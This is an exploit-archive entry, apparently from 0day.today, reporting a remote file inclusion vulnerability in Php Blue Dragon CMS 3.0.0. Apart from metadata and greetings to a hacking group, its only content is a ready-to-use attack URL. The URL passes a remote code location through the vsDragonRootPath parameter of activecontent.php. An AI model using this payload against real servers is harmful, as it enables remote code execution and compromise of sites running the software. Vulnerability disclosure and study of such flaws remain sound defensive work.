id: 2070
date: 08/09/2007
title: Php Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability
author: Kacper
cves: 

=============================================================
Php Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability
=============================================================



// Exploit Name: Php Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability
//Script Homepage: http://phpbluedragon.pl/

//Pozdrawiam wszystkich ludzi z DEVIL TEAM, Zapraszam na irc!


//Elo

Vulnerability:


http://127.0.0.1/~phpbluedragon3.0.0/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=[evil_code?]



#  0day.today [2023-03-24]  #